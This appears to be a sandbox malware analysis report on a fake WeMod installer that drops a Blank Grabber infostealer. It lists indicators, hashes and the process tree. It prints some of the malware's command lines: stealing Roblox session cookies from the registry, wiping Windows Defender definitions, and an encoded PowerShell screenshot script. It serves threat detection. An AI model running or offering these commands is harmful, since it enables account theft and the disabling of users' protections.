File name:

WeMod-Setup.exe

Full analysis: https://app.any.run/tasks/0fef9acb-7cde-4a8e-85ee-7aeea75208c8
Verdict: Malicious activity
Threats:

Blank Grabber is an infostealer written in Python. It is designed to steal a wide array of data, such as browser login credentials, crypto wallets, Telegram sessions, and Discord tokens. It is an open-source malware, with its code available on GitHub and regularly receiving updates. Blank Grabber builder’s simple interface lets threat actors even with basic skills to deploy it and conduct attacks.

Malware Trends Tracker     >>>
Analysis date: April 20, 2025, 15:19:11
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
python
evasion
stealer
screenshot
blankgrabber
telegram
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 4 sections
MD5:

B5D9EC4463780FE7FF0CAD5B7E794EC2

SHA1:

69AB8569815E707ACC253A3B1FD98F2559A2C7C0

SHA256:

106E7414F8277F8DC4B666BC1AB54E97B0192E677F4823D3FDD265BF1366F870

SSDEEP:

98304:XwhWmAuO/7MKXKvgAbcuzB+cbdBKKho6yLUmIhmEsgNx/1hdExas3lAKWDgN/RgW:QthMXiz9papGsqjjan

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Adds path to the Windows Defender exclusion list

      • VegaStealer_v1.exe (PID: 7816)
      • cmd.exe (PID: 7860)

    • Antivirus name has been found in the command line (generic signature)

      • cmd.exe (PID: 7868)

    • Changes settings for protection against network attacks (IPS)

      • powershell.exe (PID: 8080)

    • Changes Controlled Folder Access settings

      • powershell.exe (PID: 8080)

    • Changes settings for real-time protection

      • powershell.exe (PID: 8080)

    • Changes settings for checking scripts for malicious actions

      • powershell.exe (PID: 8080)

    • Changes settings for sending potential threat samples to Microsoft servers

      • powershell.exe (PID: 8080)

    • Changes settings for reporting to Microsoft Active Protection Service (MAPS)

      • powershell.exe (PID: 8080)

    • Changes Windows Defender settings

      • cmd.exe (PID: 7860)
      • cmd.exe (PID: 7868)

    • Changes antivirus protection settings for downloading files from the Internet (IOAVProtection)

      • powershell.exe (PID: 8080)

    • Steals credentials from Web Browsers

      • VegaStealer_v1.exe (PID: 7816)

    • Actions looks like stealing of personal data

      • VegaStealer_v1.exe (PID: 7816)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1168)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 3176)

    • Resets Windows Defender malware definitions to the base version

      • MpCmdRun.exe (PID: 1240)

    • BLANKGRABBER has been detected (SURICATA)

      • VegaStealer_v1.exe (PID: 7816)

  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • WeMod-Setup.exe (PID: 7644)
      • WeMod_Setup.exe (PID: 7712)

    • Executable content was dropped or overwritten

      • WeMod-Setup.exe (PID: 7644)
      • VegaStealer_v1.exe (PID: 7692)
      • csc.exe (PID: 5548)

    • Process drops legitimate windows executable

      • VegaStealer_v1.exe (PID: 7692)

    • The process drops C-runtime libraries

      • VegaStealer_v1.exe (PID: 7692)

    • Application launched itself

      • VegaStealer_v1.exe (PID: 7692)

    • Loads Python modules

      • VegaStealer_v1.exe (PID: 7816)

    • Found strings related to reading or modifying Windows Defender settings

      • VegaStealer_v1.exe (PID: 7816)

    • Get information on the list of running processes

      • VegaStealer_v1.exe (PID: 7816)
      • cmd.exe (PID: 7892)
      • cmd.exe (PID: 4812)
      • cmd.exe (PID: 896)
      • cmd.exe (PID: 6668)

    • Script disables Windows Defender's IPS

      • cmd.exe (PID: 7868)

    • Starts CMD.EXE for commands execution

      • VegaStealer_v1.exe (PID: 7816)

    • Reads Internet Explorer settings

      • WeMod_Setup.exe (PID: 7712)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 7868)
      • cmd.exe (PID: 7860)
      • cmd.exe (PID: 7664)
      • cmd.exe (PID: 3176)
      • cmd.exe (PID: 6620)
      • cmd.exe (PID: 1184)
      • cmd.exe (PID: 5556)
      • cmd.exe (PID: 2420)

    • Script disables Windows Defender's real-time protection

      • cmd.exe (PID: 7868)

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 7860)

    • Uses WMIC.EXE to obtain Windows Installer data

      • cmd.exe (PID: 7980)
      • cmd.exe (PID: 7576)
      • cmd.exe (PID: 5392)

    • Checks for external IP

      • svchost.exe (PID: 2196)
      • VegaStealer_v1.exe (PID: 7816)

    • Accesses video controller name via WMI (SCRIPT)

      • WMIC.exe (PID: 1188)
      • WMIC.exe (PID: 6040)
      • WMIC.exe (PID: 8160)

    • Uses WMIC.EXE to obtain a list of video controllers

      • cmd.exe (PID: 3240)
      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 7680)

    • Accesses product unique identifier via WMI (SCRIPT)

      • WMIC.exe (PID: 8152)
      • WMIC.exe (PID: 7284)

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 3176)

    • Uses NETSH.EXE to obtain data on the network

      • cmd.exe (PID: 6048)

    • Uses SYSTEMINFO.EXE to read the environment

      • cmd.exe (PID: 2140)

    • Starts application with an unusual extension

      • cmd.exe (PID: 7352)
      • cmd.exe (PID: 8052)
      • cmd.exe (PID: 5508)
      • cmd.exe (PID: 2236)
      • cmd.exe (PID: 4724)
      • cmd.exe (PID: 7404)

    • Accesses antivirus product name via WMI (SCRIPT)

      • WMIC.exe (PID: 8168)

    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 3176)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 3176)

    • Reads Microsoft Outlook installation path

      • WeMod_Setup.exe (PID: 7712)

    • Process drops python dynamic module

      • VegaStealer_v1.exe (PID: 7692)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 5548)

    • Captures screenshot (POWERSHELL)

      • powershell.exe (PID: 1168)

    • Uses WMIC.EXE to obtain operating system information

      • cmd.exe (PID: 4620)

    • There is functionality for taking screenshot (YARA)

      • VegaStealer_v1.exe (PID: 7692)

    • Accesses operating system name via WMI (SCRIPT)

      • WMIC.exe (PID: 7604)

    • Uses WMIC.EXE to obtain computer system information

      • cmd.exe (PID: 1188)

    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • VegaStealer_v1.exe (PID: 7816)

  • INFO

    • Reads the computer name

      • WeMod-Setup.exe (PID: 7644)
      • WeMod_Setup.exe (PID: 7712)
      • VegaStealer_v1.exe (PID: 7692)
      • VegaStealer_v1.exe (PID: 7816)
      • MpCmdRun.exe (PID: 1240)

    • Checks supported languages

      • WeMod-Setup.exe (PID: 7644)
      • WeMod_Setup.exe (PID: 7712)
      • VegaStealer_v1.exe (PID: 7692)
      • VegaStealer_v1.exe (PID: 7816)
      • tree.com (PID: 7212)
      • tree.com (PID: 7608)
      • tree.com (PID: 2152)
      • tree.com (PID: 7304)
      • tree.com (PID: 7188)
      • csc.exe (PID: 5548)
      • tree.com (PID: 5048)
      • cvtres.exe (PID: 5008)
      • MpCmdRun.exe (PID: 1240)

    • Create files in a temporary directory

      • WeMod-Setup.exe (PID: 7644)
      • VegaStealer_v1.exe (PID: 7692)
      • VegaStealer_v1.exe (PID: 7816)
      • csc.exe (PID: 5548)
      • cvtres.exe (PID: 5008)
      • MpCmdRun.exe (PID: 1240)

    • Process checks computer location settings

      • WeMod-Setup.exe (PID: 7644)

    • The sample compiled with english language support

      • VegaStealer_v1.exe (PID: 7692)

    • Reads the machine GUID from the registry

      • WeMod_Setup.exe (PID: 7712)
      • csc.exe (PID: 5548)

    • Checks proxy server information

      • WeMod_Setup.exe (PID: 7712)

    • Reads the software policy settings

      • WeMod_Setup.exe (PID: 7712)

    • Creates files or folders in the user directory

      • WeMod_Setup.exe (PID: 7712)

    • Reads security settings of Internet Explorer

      • WMIC.exe (PID: 8152)
      • WMIC.exe (PID: 1188)
      • WMIC.exe (PID: 8168)
      • WMIC.exe (PID: 6040)
      • WMIC.exe (PID: 7316)
      • WMIC.exe (PID: 7284)
      • WMIC.exe (PID: 8160)
      • WMIC.exe (PID: 7604)

    • The Powershell gets current clipboard

      • powershell.exe (PID: 2340)

    • Checks the directory tree

      • tree.com (PID: 7608)
      • tree.com (PID: 2152)
      • tree.com (PID: 7212)
      • tree.com (PID: 5048)
      • tree.com (PID: 7304)
      • tree.com (PID: 7188)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 660)
      • powershell.exe (PID: 8080)
      • powershell.exe (PID: 4896)
      • powershell.exe (PID: 8088)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 8080)
      • powershell.exe (PID: 8088)

    • Displays MAC addresses of computer network adapters

      • getmac.exe (PID: 6744)

    • PyInstaller has been detected (YARA)

      • VegaStealer_v1.exe (PID: 7692)

    • Attempting to use instant messaging service

      • svchost.exe (PID: 2196)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ 4.x (75)
.exe | Win64 Executable (generic) (15.3)
.dll | Win32 Dynamic Link Library (generic) (3.6)
.exe | Win32 Executable (generic) (2.5)
.exe | Win16/32 Executable Delphi generic (1.1)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2013:06:15 16:44:28+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 5.12
CodeSize: 3584
InitializedDataSize: 10132992
UninitializedDataSize: -
EntryPoint: 0x1ae1
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 8.0.0.0
ProductVersionNumber: 8.0.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
Comments: WeMod Setup
CompanyName: WeMod LLC
FileDescription: WeMod Setup
FileVersion: 8.0.0.0
InternalName: WeMod-Setup.exe
LegalCopyright: Copyright © WeMod LLC 2022
LegalTrademarks: -
OriginalFileName: WeMod-Setup.exe
ProductName: WeMod
ProductVersion: 8.0.0.0
AssemblyVersion: 8.0.0.0
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
236
Monitored processes
107
Malicious processes
6
Suspicious processes
4

Behavior graph

Click at the process to see the details
start wemod-setup.exe vegastealer_v1.exe wemod_setup.exe #BLANKGRABBER vegastealer_v1.exe cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs tasklist.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs svchost.exe cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs tasklist.exe no specs tasklist.exe no specs wmic.exe no specs tasklist.exe no specs powershell.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs reg.exe no specs powershell.exe no specs netsh.exe no specs systeminfo.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs csc.exe cvtres.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs tiworker.exe no specs mpcmdrun.exe no specs cmd.exe no specs conhost.exe no specs getmac.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs slui.exe no specs wemod-setup.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
660powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYC:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
856\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
896C:\WINDOWS\system32\cmd.exe /c "tasklist /FO LIST"C:\Windows\System32\cmd.exeVegaStealer_v1.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
1040C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exe -EmbeddingC:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exesvchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Modules Installer Worker
Version:
10.0.19041.3989 (WinBuild.160101.0800)
Modules
Images
c:\windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\tiworker.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
1052\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1168powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
1184C:\WINDOWS\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"C:\Windows\System32\cmd.exeVegaStealer_v1.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
1188wmic path win32_VideoController get nameC:\Windows\System32\wbem\WMIC.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
1188C:\WINDOWS\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"C:\Windows\System32\cmd.exeVegaStealer_v1.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
1240"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllC:\Program Files\Windows Defender\MpCmdRun.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft Malware Protection Command Line Utility
Exit code:
0
Version:
4.18.1909.6 (WinBuild.160101.0800)
Modules
Images
c:\program files\windows defender\mpcmdrun.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
Total events
53 735
Read events
53 727
Write events
6
Delete events
2

Modification events

(PID) Process:(7712) WeMod_Setup.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(7712) WeMod_Setup.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(7712) WeMod_Setup.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(7816) VegaStealer_v1.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Multimedia\DrawDib
Operation:writeName: 1280x720x32(BGR 0)
Value:
31,31,31,31
(PID) Process:(1040) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdHigh
Value:
31175175
(PID) Process:(1040) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdLow
Value:
(PID) Process:(7712) WeMod_Setup.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\LowRegistry
Operation:delete valueName:AddToFavoritesInitialSelection
Value:
(PID) Process:(7712) WeMod_Setup.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\LowRegistry
Operation:delete valueName:AddToFeedsInitialSelection
Value:
Executable files
61
Suspicious files
44
Text files
34
Unknown types
0

Dropped files

PID
Process
Filename
Type
7644WeMod-Setup.exeC:\Users\admin\AppData\Local\Temp\VegaStealer_v1.exeexecutable
MD5:243DCA248CABCEFAC70874F55AB362C6
SHA256:2C67E60F81A501036DE89E28887A9103598B69B3EF57BBFE4FE3C4CC418482D5
7692VegaStealer_v1.exeC:\Users\admin\AppData\Local\Temp\_MEI76922\_ctypes.pydexecutable
MD5:10FDCF63D1C3C3B7E5861FBB04D64557
SHA256:BC3B83D2DC9E2F0E6386ED952384C6CF48F6EED51129A50DFD5EF6CBBC0A8FB3
7692VegaStealer_v1.exeC:\Users\admin\AppData\Local\Temp\_MEI76922\VCRUNTIME140.dllexecutable
MD5:4585A96CC4EEF6AAFD5E27EA09147DC6
SHA256:A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
7692VegaStealer_v1.exeC:\Users\admin\AppData\Local\Temp\_MEI76922\_ssl.pydexecutable
MD5:9B4E74FD1DE0F8A197E4AA1E16749186
SHA256:A4CE52A9E0DADDBBE7A539D1A7EDA787494F2173DDCC92A3FAF43B7CF597452B
7692VegaStealer_v1.exeC:\Users\admin\AppData\Local\Temp\_MEI76922\_socket.pydexecutable
MD5:899380B2D48DF53414B974E11BB711E3
SHA256:B38E66E6EE413E5955EF03D619CADD40FCA8BE035B43093D2342B6F3739E883E
7692VegaStealer_v1.exeC:\Users\admin\AppData\Local\Temp\_MEI76922\_queue.pydexecutable
MD5:6E00E0821BB519333CCFD4E61A83CB38
SHA256:2AD02D49691A629F038F48FCDEE46A07C4FCC2CB0620086E7B09AC11915AE6B7
7644WeMod-Setup.exeC:\Users\admin\AppData\Local\Temp\WeMod_Setup.exeexecutable
MD5:C51DE991E9F12989F706382423F25829
SHA256:DD49DF1955D1FB85F497B90561488F8B1913401C1A90EF24D07C27B42D1929AC
7692VegaStealer_v1.exeC:\Users\admin\AppData\Local\Temp\_MEI76922\_decimal.pydexecutable
MD5:21C73E7E0D7DAD7A1FE728E3B80CE073
SHA256:A28C543976AA4B6D37DA6F94A280D72124B429F458D0D57B7DBCF71B4BEA8F73
